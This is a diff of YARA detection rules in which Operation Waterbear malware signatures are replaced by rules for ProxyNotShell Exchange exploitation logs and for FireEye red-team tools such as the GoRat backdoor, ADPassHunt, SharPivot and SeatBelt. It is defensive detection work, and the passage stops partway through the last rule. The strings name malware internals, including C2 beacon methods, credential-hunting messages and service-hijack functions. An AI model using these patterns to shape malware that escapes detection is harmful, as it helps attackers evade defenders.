-rule SIGNATURE_BASE_Waterbear_1_Jun17 : FILE
+rule SIGNATURE_BASE_EXPL_LOG_Proxynotshell_OWASSRF_Powershell_Proxy_Log_Dec22_3 : CVE_2022_41040 CVE_2022_41082
 {
 	meta:
-		description = "Detects malware from Operation Waterbear"
+		description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2202506a-6009-5321-a8b2-df3bff51d06f"
-		date = "2017-06-23"
+		id = "76dd786e-daaa-5cd9-8e3e-50d9eab7f9d2"
+		date = "2022-12-22"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/L9g9eR"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L11-L25"
+		reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxynotshell_owassrf_dec22.yar#L47-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f1d5bd0c9f85dd90217bdbd7e44100bcfbf77839f83416ad17121713c189b9fd"
-		score = 75
+		logic_hash = "607d3743a46e0c5000b9c7847dd89f5d7ccf29f4f1af9bce6870d7738f071f5c"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dd3676f478ee6f814077a12302d38426760b0701bb629f413f7bf2ec71319db5"
+		tags = "CVE-2022-41040, CVE-2022-41082"
 
 	strings:
-		$s1 = "\\Release\\svc.pdb" ascii
-		$s2 = "svc.dll" fullword ascii
+		$sa1 = " POST /powershell - 444 " ascii wide
+		$sa2 = " POST /Powershell - 444 " ascii wide
+		$sb1 = " - 200 0 0 2" ascii wide
+		$fp1 = "ClientInfo" ascii wide fullword
+		$fp2 = "Microsoft WinRM Client" ascii wide fullword
+		$fp3 = "Exchange BackEnd Probes" ascii wide fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		1 of ( $sa* ) and $sb1 and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Waterbear_2_Jun17 : FILE
+rule SIGNATURE_BASE_EXPL_LOG_Proxynotshell_Powershell_Proxy_Log_Dec22_1 : CVE_2022_41040 CVE_2022_41082
 {
 	meta:
-		description = "Detects malware from Operation Waterbear"
+		description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d3178f01-90a8-5a82-9c95-40bf8e9b567f"
-		date = "2017-06-23"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/L9g9eR"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L27-L43"
+		id = "5af3ae70-8897-593f-a413-82ca1d1ba961"
+		date = "2022-12-22"
+		modified = "2023-01-26"
+		reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxynotshell_owassrf_dec22.yar#L68-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ec0b8d7313f925adafb7f03c8b7fd12c0176b75c74c642eeee900e911e0662a7"
-		score = 75
+		logic_hash = "f2aac61bc17f74901ec8d638d5cfaaa45bbd2a4e40e5d915bf2a946daed411d2"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dcb5c350af76c590002a8ea00b01d862b4d89cccbec3908bfe92fdf25eaa6ea4"
+		tags = "CVE-2022-41040, CVE-2022-41082"
 
 	strings:
-		$s1 = "downloading movie" fullword ascii
-		$s2 = "name=\"test.exe\"/>" fullword ascii
-		$s3 = "<description>Test Application</description>" fullword ascii
-		$s4 = "UI look 2003" fullword wide
+		$re1 = /,\/[Pp][Oo][Ww][Ee][Rr][Ss][Hh][Ee][Ll][Ll][^\n]{0,50},Kerberos,true,[^\n]{0,50},200,0,,,,[^\n]{0,2000};OnEndRequest\.End\.ContentType=application\/soap\+xml charset UTF-8;S:ServiceCommonMetadata\.HttpMethod=POST;/ ascii wide
+		$fp1 = "ClientInfo" ascii wide fullword
+		$fp2 = "Microsoft WinRM Client" ascii wide fullword
+		$fp3 = "Exchange BackEnd Probes" ascii wide fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+		$re1 and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Waterbear_4_Jun17 : FILE
+rule SIGNATURE_BASE_APT_Backdoor_Win_GORAT_3_1 : FILE
 {
 	meta:
-		description = "Detects malware from Operation Waterbear"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c7941f92-12ee-5d57-b58e-c8caf74ca6ba"
-		date = "2017-06-23"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/L9g9eR"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L45-L68"
+		description = "This rule uses the same logic as FE_APT_Trojan_Win_GORAT_1_FEBeta with the addition of one check, to look for strings that are known to be in the Gorat implant when a certain cleaning script is not run against it."
+		author = "FireEye"
+		id = "94c195b5-b8e8-56a7-bc11-dbbe2f969b06"
+		date = "2025-02-12"
+		modified = "2025-02-12"
+		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fireeye_redteam_tools.yar#L47-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "46c43dbdcbc183995a8cd00c9888afcdd3adb9f3caf38ed42a0af1e7df39715f"
+		hash = "995120b35db9d2f36d7d0ae0bfc9c10d"
+		logic_hash = "4fda951281b3d711e50c24f543b528b93295a119af39245b4bece77f641bbf2b"
 		score = 75
-		quality = 85
+		quality = 38
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2e9cb7cadb3478edc9ef714ca4ddebb45e99d35386480e12792950f8a7a766e1"
 
 	strings:
-		$x1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" fullword ascii
-		$s1 = "Wininet.dll InternetOpenA InternetConnectA HttpOpenRequestA HttpSendRequestA HttpQueryInfoA InternetReadFile InternetCloseHandle" fullword ascii
-		$s2 = "read from pipe:%s" fullword ascii
-		$s3 = "delete pipe" fullword ascii
-		$s4 = "cmdcommand:%s" fullword ascii
-		$s5 = "%s /c del %s" fullword ascii
-		$s6 = "10.0.0.250" fullword ascii
-		$s7 = "Vista/2008" fullword ascii
-		$s8 = "%02X%02X%02X%02X%02X%02X%04X" fullword ascii
-		$s9 = "UNKOWN" fullword ascii
+		$dirty1 = "fireeye" ascii nocase wide
+		$dirty2 = "kulinacs" ascii nocase wide
+		$dirty3 = "RedFlare" ascii nocase wide
+		$dirty4 = "gorat" ascii nocase wide
+		$dirty5 = "flare" ascii nocase wide
+		$go1 = "go.buildid" ascii wide
+		$go2 = "Go build" ascii wide
+		$json1 = "json:\"pid\"" ascii wide
+		$json2 = "json:\"key\"" ascii wide
+		$json3 = "json:\"agent_time\"" ascii wide
+		$json4 = "json:\"rid\"" ascii wide
+		$json5 = "json:\"ports\"" ascii wide
+		$json6 = "json:\"agent_platform\"" ascii wide
+		$rat = "rat" ascii wide
+		$str1 = "handleCommand" ascii wide
+		$str2 = "sendBeacon" ascii wide
+		$str3 = "rat.AgentVersion" ascii wide
+		$str4 = "rat.Core" ascii wide
+		$str5 = "rat/log" ascii wide
+		$str6 = "rat/comms" ascii wide
+		$str7 = "rat/modules" ascii wide
+		$str8 = "murica" ascii wide
+		$str9 = "master secret" ascii wide
+		$str10 = "TaskID" ascii wide
+		$str11 = "rat.New" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and all of ( $go* ) and all of ( $json* ) and all of ( $str* ) and #rat > 1000 and any of ( $dirty* )
 }
-rule SIGNATURE_BASE_Waterbear_5_Jun17 : FILE
+rule SIGNATURE_BASE_Credtheft_MSIL_Adpasshunt_2_1 : FILE
 {
 	meta:
-		description = "Detects malware from Operation Waterbear"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f92fe6d5-0afa-50a1-bdcf-c6dd78aa6809"
-		date = "2017-06-23"
-		modified = "2023-01-07"
-		reference = "https://goo.gl/L9g9eR"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L70-L90"
+		description = "No description has been set in the source file - Signature Base"
+		author = "FireEye"
+		id = "44ba09c3-ac0a-58e7-b98c-dedcbf208d00"
+		date = "2025-02-12"
+		modified = "2025-02-12"
+		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fireeye_redteam_tools.yar#L845-L861"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a1572db08242fffadedbfb89f3652b2eb93c910f3b61f9db0622bc18d069827c"
-		score = 75
+		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
+		logic_hash = "a76faa34a1f9cc891aeaa65525c8698e49d5a141854ca0cffb42f06a251bea43"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		hash1 = "d3678cd9744b3aedeba23a03a178be5b82d5f8059a86f816007789a9dd06dc7d"
 
 	strings:
-		$a1 = "ICESWORD" fullword ascii
-		$a2 = "klog.dat" fullword ascii
-		$s1 = "\\cswbse.dll" ascii
-		$s2 = "WIRESHARK" fullword ascii
-		$s3 = "default_zz|" fullword ascii
-		$s4 = "%c4%u-%.2u-%.2u %.2u:%.2u" fullword ascii
-		$s5 = "1111%c%s" fullword ascii
+		$pdb1 = "\\ADPassHunt\\"
+		$pdb2 = "\\ADPassHunt.pdb"
+		$s1 = "Usage: .\\ADPassHunt.exe"
+		$s2 = "[ADA] Searching for accounts with msSFU30Password attribute"
+		$s3 = "[ADA] Searching for accounts with userpassword attribute"
+		$s4 = "[GPP] Searching for passwords now"
 
 	condition:
-		( uint16( 0 ) == 0x3d53 and filesize < 100KB and ( all of ( $a* ) or 3 of them ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( @pdb2 [ 1 ] < @pdb1 [ 1 ] + 50 ) or 2 of ( $s* )
 }
-rule SIGNATURE_BASE_Waterbear_6_Jun17 : FILE
+rule SIGNATURE_BASE_APT_Backdoor_Win_Gorat_Memory_1
 {
 	meta:
-		description = "Detects malware from Operation Waterbear"
-		author = "Florian Roth (Nextron Systems)"
-		id = "86d203be-2d3a-54f2-b851-9080d5be36f5"
-		date = "2017-06-23"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/L9g9eR"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L92-L106"
+		description = "Identifies GoRat malware in memory based on strings."
+		author = "FireEye"
+		id = "4fcdd98f-1873-58e1-a9f5-73ee0aa5a69f"
+		date = "2025-02-12"
+		modified = "2025-02-12"
+		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fireeye_redteam_tools.yar#L1013-L1039"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "af5c2a29e0a62c54e706492ae85b9786a6d9e5f42fe4d9c43693576e1a63b825"
+		hash = "3b926b5762e13ceec7ac3a61e85c93bb"
+		logic_hash = "bf8d80b7a7d35c1bcb353ff66d10bc95c2e6502043acc6554887465a467cdcf7"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "409cd490feb40d08eb33808b78d52c00e1722eee163b60635df6c6fe2c43c230"
+		tags = ""
 
 	strings:
-		$s1 = "svcdll.dll" fullword ascii
-		$s2 = "log.log" fullword ascii
+		$rat1 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword
+		$rat2 = "rat.(*Core).generateBeacon" fullword
+		$rat3 = "rat.gJitter" fullword
+		$rat4 = "rat/comms.(*protectedChannel).SendCmdResponse" fullword
+		$rat5 = "rat/modules/filemgmt.(*acquire).NewCommandExecution" fullword
+		$rat6 = "rat/modules/latlisten.(*latlistensrv).handleCmd" fullword
+		$rat7 = "rat/modules/netsweeper.(*netsweeperRunner).runSweep" fullword
+		$rat8 = "rat/modules/netsweeper.(*Pinger).listen" fullword
+		$rat9 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword
+		$rat10 = "rat/platforms/win/dyloader.(*memoryLoader).ExecutePluginFunction" fullword
+		$rat11 = "rat/platforms/win/modules/namedpipe.(*dummy).Open" fullword
+		$winblows = "rat/platforms/win.(*winblows).GetStage" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them )
+		$winblows or 3 of ( $rat* )
 }
-rule SIGNATURE_BASE_Waterbear_7_Jun17 : FILE
+rule SIGNATURE_BASE_Hacktool_MSIL_Sharpivot_3_1 : FILE
 {
 	meta:
-		description = "Detects malware from Operation Waterbear"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4613df5b-495e-5738-9b7f-ac8ff586cd17"
-		date = "2017-06-23"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/L9g9eR"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L108-L125"
+		description = "This rule looks for .NET PE files that have the strings of various method names in the SharPivot code."
+		author = "FireEye"
+		id = "956ba026-c2fa-55fd-be53-0cfaa345f27a"
+		date = "2025-02-12"
+		modified = "2025-02-12"
+		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fireeye_redteam_tools.yar#L1145-L1174"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6a760abca78e799b194864ad56457ccb0b05123307da6bfcad0c66da47f485a1"
+		hash = "e4efa759d425e2f26fbc29943a30f5bd"
+		logic_hash = "f51ac9637f47a98beee1b3c37b594e292aab0e1d3f9e49c41b1f3c3ce02e17de"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6891aa78524e442f4dda66dff51db9798e1f92e6fefcdf21eb870b05b0293134"
 
 	strings:
-		$s1 = "Bluthmon.exe" fullword wide
-		$s2 = "Motomon.exe" fullword wide
-		$s3 = "%d.%s%d%d%d" fullword ascii
-		$s4 = "mywishes.hlp" fullword ascii
-		$s5 = "filemon.rtf" fullword ascii
+		$msil = "_CorExeMain" ascii wide
+		$str1 = "SharPivot" ascii wide
+		$str2 = "ParseArgs" ascii wide
+		$str3 = "GenRandomString" ascii wide
+		$str4 = "ScheduledTaskExists" ascii wide
+		$str5 = "ServiceExists" ascii wide
+		$str6 = "lpPassword" ascii wide
+		$str7 = "execute" ascii wide
+		$str8 = "WinRM" ascii wide
+		$str9 = "SchtaskMod" ascii wide
+		$str10 = "PoisonHandler" ascii wide
+		$str11 = "SCShell" ascii wide
+		$str12 = "SchtaskMod" ascii wide
+		$str13 = "ServiceHijack" ascii wide
+		$str14 = "ServiceHijack" ascii wide
+		$str15 = "commandArg" ascii wide
+		$str16 = "payloadPath" ascii wide
+		$str17 = "Schtask" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
 }
-rule SIGNATURE_BASE_Waterbear_8_Jun17 : FILE
+rule SIGNATURE_BASE_Hacktool_MSIL_SEATBELT_1_1 : FILE
 {
 	meta:
-		description = "Detects malware from Operation Waterbear"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5ebeda22-ad67-5715-b42f-9b4bb5dcde94"
-		date = "2017-06-23"
-		modified = "2023-01-07"
-		reference = "https://goo.gl/L9g9eR"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L127-L145"
+		description = "This rule looks for .NET PE files that have regex and format strings found in the public tool SeatBelt. Due to the nature of the regex and format strings used for detection, this rule should detect custom variants of the SeatBelt project."
+		author = "FireEye"
+		id = "cfd730ac-1eec-5e04-b871-c14912bc0425"
+		date = "2020-12-08"
+		modified = "2023-01-27"
+		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fireeye_redteam_tools.yar#L1210-L1233"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3b1dfe486ea141342f253963ce6cc1e73d063ce880cf2fcee1aaa6aa6e919349"
+		hash = "848837b83865f3854801be1f25cb9f4d"
+		logic_hash = "89275ec08b75cef371b70fb749cbcada3f30309869094ab7940811fe40f8a008"
 		score = 75
-		quality = 85
+		quality = 67
 		tags = "FILE"
-		hash1 = "bd06f6117a0abf1442826179f6f5e1932047b4a6c14add9149e8288ab4a902c3"
-		hash1 = "5dba8ddf05cb204ef320a72a0c031e55285202570d7883f2ff65135ec35b3dd0"
 
 	strings:
-		$s1 = "Update.dll" fullword ascii
-		$s2 = "ADVPACK32.DLL" fullword wide
-		$s3 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Services\\" ascii
-		$s4 = "\\drivers\\sftst.sys" ascii
-		$s5 = "\\\\.\\SFilter" fullword ascii
+		$msil = "_CorExeMain" ascii wide
+		$str1 = "{ Process = {0}, Path = {1}, CommandLine = {2} }" ascii nocase wide
+		$str2 = "Domain=\"(.*)\",Name=\"(.*)\"" ascii nocase wide
+		$str3 = "LogonId=\"(\\d+)\"" ascii nocase wide
+		$str4 = "{0}.{1}.{2}.{3}" ascii nocase wide
+		$str5 = "^\\W*([a-z]:\\\\.+?(\\.exe|\\.dll|\\.sys))\\W*" ascii nocase wide
+		$str6 = "*[System/EventID={0}]" ascii nocase wide
+		$str7 = "*[System[TimeCreated[@SystemTime >= '{" ascii nocase wide
+		$str8 = "(http|ftp|https|file)://([\\w_-]+(?:(?:\\.[\\w_-]+)+))([\\w.,@?^=%&:/~+#-]*[\\w@?^=%&/~+#-])?" ascii nocase wide
+		$str10 = "{0,-23}" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
 }
-rule SIGNATURE_BASE_Waterbear_9_Jun17 : FILE
+rule SIGNATURE_BASE_APT_Builder_PY_REDFLARE_2_1
 {
 	meta:
-		description = "Detects malware from Operation Waterbear"
-		author = "Florian Roth (Nextron Systems)"
-		id = "727cdb55-ede5-5520-9aa9-5a265b5aeba1"
-		date = "2017-06-23"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/L9g9eR"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L147-L166"
+		description = "No description has been set in the source file - Signature Base"
+		author = "FireEye"
+		id = "74c56ee1-734e-5fdb-beee-6345a5993f68"
+		date = "2020-12-01"
+		modified = "2020-12-01"
+		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fireeye_redteam_tools.yar#L1376-L1391"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b54f3032b31c5a48e879e49bd97adf3222db46a7789afc4ea2f5eca32536a2e4"
+		hash = "4410e95de247d7f1ab649aa640ee86fb"
+		logic_hash = "0f28fb23c0c1d589466c7c541c8dc588b038d02dded0c66c4a448d1f768c95c5"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fc74d2434d48b316c9368d3f90fea19d76a20c09847421d1469268a32f59664c"
+		tags = ""
 
 	strings:
-		$s1 = "ADVPACK32.DLL" fullword wide
-		$s2 = "ADVPACK32" fullword wide
-		$a1 = "U2_Dll.dll" fullword ascii
-		$b1 = "ProUpdate" fullword ascii
-		$b2 = "Update.dll" fullword ascii
+		$s1 = "<510sxxII"
+		$s2 = "0x43,0x00,0x3a,0x00,0x5c,0x00,0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00,"
+		$s3 = "parsePluginOutput"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and all of ( $s* ) and ( $a1 or all of ( $b* ) )
+		all of them and #s2 == 2
 }
-rule SIGNATURE_BASE_Waterbear_10_Jun17 : FILE
+rule SIGNATURE_BASE_APT_Backdoor_Win_GORAT_2_1 : FILE
 {
 	meta:
-		description = "Detects malware from Operation Waterbear"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1219c3e6-1001-5075-b7fc-e0d8a7de6a65"
-		date = "2017-06-23"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/L9g9eR"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L168-L182"
+		description = "Verifies that the sample is a Windows PE that is less than 10MB in size and has the Go build ID strings. Then checks for various strings known to be in the Gorat implant including strings used in C2 json, names of methods, and the unique string 'murica' used in C2 comms. A check is done to ensure the string 'rat' appears in the binary over 1000 times as it is the name of the project used by the implant and is present well over 2000 times."
+		author = "FireEye"
+		id = "e2c47711-d088-5cb4-8d21-f8199a865a28"
+		date = "2025-02-12"
+		modified = "2025-02-12"
+		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fireeye_redteam_tools.yar#L1453-L1484"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1e71a317f782b73c876f0cb5fee25b69d8f1c45c20c58e4f204b7aeb7484cf14"
+		hash = "f59095f0ab15f26a1ead7eed8cdb4902"
+		logic_hash = "45c83e0d39184abcbc0ccc5804ab745b4feec1fad424a543a05754e5b4cca311"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3b1e67e0e86d912d7bc6dee5b0f801260350e8ce831c93c3e9cfe5a39e766f41"
 
 	strings:
-		$s1 = "ADVPACK32.DLL" fullword wide
-		$s5 = "ADVPACK32" fullword wide
+		$go1 = "go.buildid" ascii wide
+		$go2 = "Go build" ascii wide
+		$json1 = "json:\"pid\"" ascii wide
+		$json2 = "json:\"key\"" ascii wide
+		$json3 = "json:\"agent_time\"" ascii wide
+		$json4 = "json:\"rid\"" ascii wide
+		$json5 = "json:\"ports\"" ascii wide
+		$json6 = "json:\"agent_platform\"" ascii wide
+		$rat = "rat" ascii wide
+		$str1 = "handleCommand" ascii wide
+		$str2 = "sendBeacon" ascii wide
+		$str3 = "rat.AgentVersion" ascii wide
+		$str4 = "rat.Core" ascii wide
+		$str5 = "rat/log" ascii wide
+		$str6 = "rat/comms" ascii wide
+		$str7 = "rat/modules" ascii wide
+		$str8 = "murica" ascii wide
+		$str9 = "master secret" ascii wide
+		$str10 = "TaskID" ascii wide
+		$str11 = "rat.New" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them )
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and all of ( $go* ) and all of ( $json* ) and all of ( $str* ) and #rat > 1000
 }
-rule SIGNATURE_BASE_Waterbear_11_Jun17 : FILE
+
+rule SIGNATURE_BASE_APT_Backdoor_Win_GORAT_4_1 : FILE
 {
 	meta:
-		description = "Detects malware from Operation Waterbear"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d7eb7561-c84e-5149-920c-35ad225ca8a9"
-		date = "2017-06-23"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/L9g9eR"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L185-L201"
+		description = "Verifies that the sample is a Windows PE that is less than 10MB in size and exports numerous functions that are known to be exported by the Gorat implant. This is done in an effort to provide detection for packed samples that may not have other strings but will need to replicate exports to maintain functionality."
+		author = "FireEye"
+		id = "ae67445c-e7fd-5858-be8b-7ee84a16a031"
+		date = "2025-02-12"
+		modified = "2025-02-12"
+		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fireeye_redteam_tools.yar#L1706-L1716"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ea61c348847614ad2872bfd385f433c5a30c7f6b5f5a2f135a7d83c553157ccd"
+		hash = "f59095f0ab15f26a1ead7eed8cdb4902"
+		logic_hash = "fa76e994beb2ab1b7950cf9d6391adf4e1ba45586a14a6340fa8a25a904821e4"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b046b2e2569636c2fc3683a0da8cfad25ff47bc304145be0f282a969c7397ae8"
-
-	strings:
-		$s1 = "/Pages/%u.asp" fullword wide
-		$s2 = "NVIDIA Corporation." fullword wide
-		$s3 = "tqxbLc|fP_{eOY{eOX{eO" fullword ascii
-		$s4 = "Copyright (C) 2005" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and pe.exports ( "MemoryCallEntryPoint" ) and pe.exports ( "MemoryDefaultAlloc" ) and pe.exports ( "MemoryDefaultFree" ) and pe.exports ( "MemoryDefaultFreeLibrary" ) and pe.exports ( "MemoryDefaultGetProcAddress" ) and pe.exports ( "MemoryDefaultLoadLibrary" ) and pe.exports ( "MemoryFindResource" ) and pe.exports ( "MemoryFindResourceEx" ) and pe.exports ( "MemoryFreeLibrary" ) and pe.exports ( "MemoryGetProcAddress" ) and pe.exports ( "MemoryLoadLibrary" ) and pe.exports ( "MemoryLoadLibraryEx" ) and pe.exports ( "MemoryLoadResource" ) and pe.exports ( "MemoryLoadString" ) and pe.exports ( "MemoryLoadStringEx" ) and pe.exports ( "MemorySizeofResource" ) and pe.exports ( "callback" ) and pe.exports ( "crosscall2" ) and pe.exports ( "crosscall_386" )
 }
-rule SIGNATURE_BASE_Waterbear_12_Jun17 : FILE
+rule SIGNATURE_BASE_Hacktool_MSIL_PXELOOT_2_1 : FILE
 {
 	meta:
-		description = "Detects malware from Operation Waterbear"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cc0a071c-c409-57a2-80c5-dd93ca7db339"
-		date = "2017-06-23"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/L9g9eR"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbear.yar#L203-L217"
+		description = "This rule looks for .NET PE files that have the strings of various method names in the PXE And Loot code."
+		author = "FireEye"
+		id = "ff46a0e9-f7d2-57f2-9727-26b69ea5ba71"
+		date = "2020-12-08"
+		modified = "2023-01-27"
+		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fireeye_redteam_tools.yar#L2088-L2113"
